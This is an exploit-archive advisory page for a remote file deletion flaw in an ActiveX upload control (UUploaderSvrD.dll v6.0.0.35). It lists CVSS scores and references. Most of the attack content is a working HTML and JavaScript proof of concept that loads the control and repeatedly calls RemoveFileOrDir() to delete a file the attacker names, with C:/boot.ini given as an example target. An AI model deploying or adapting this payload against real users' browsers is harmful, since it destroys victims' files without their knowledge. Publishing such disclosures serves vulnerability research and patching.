Univeral HTTP Image/File Upload ActiveX Remote File Deletion

2009.04.09
Credit: t0pP8uZz
Risk: High
Local: No
Remote: Yes
CWE: CWE-16


CVSS Base Score: 8.8/10
Impact Subscore: 9.2/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Complete
Availability impact: Complete

<HTML> <!-- - Univeral HTTP Image Upload (UUploaderSvrD.dll- v6.0.0.35) Remote File Deletetion Exploit - && - Univeral HTTP File Upload (UUploaderSvrD.dll - v6.0.0.35) Remote File Deletetion Exploit - Author: t0pP8uZz Description: ActiveX Remote File Deletetion Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched ActiveX: http://image.uploadactivex.com/Download_versal_image_upload_activeX_control.htm The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions. InternetExplorer can Initialise this ActiveX control, And take advantage of its functions. The RemoveFileOrDir() function is insecure, and can delete a file of any choice. The main secuirty threat of this ActiveX control is it being Safe Scripting for InternetExplorer. Below you will find some code which makes use of the developers error and an attack can specify a file to delete. ie(C:/boot.ini) Vendor: Not Reported --> <OBJECT ID="fileup" CLASSID="CLSID:04FD48E6-0712-4937-B09E-F3D285B11D82">Could Not Load ActiveX Control.</OBJECT> <script language="javascript"> /* - Univeral HTTP Image Upload (UUploaderSvrD.dll - v6.0.0.35) Remote File Deletetion Exploit - */ /* Javascript Code By t0pP8uZz */ var x = "C:/tmp.txt"; /* Full Path To File To Delete OR directory*/ var del = true; var c = 1; while(del) { try { fileup.RemoveFileOrDir(x, c); del = false; alert("File Deleted!"); } catch(e){ c++; } } </script> </HTML>

References:

http://xforce.iss.net/xforce/xfdb/41258
http://www.securityfocus.com/bid/28301
http://www.milw0rm.com/exploits/5569


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top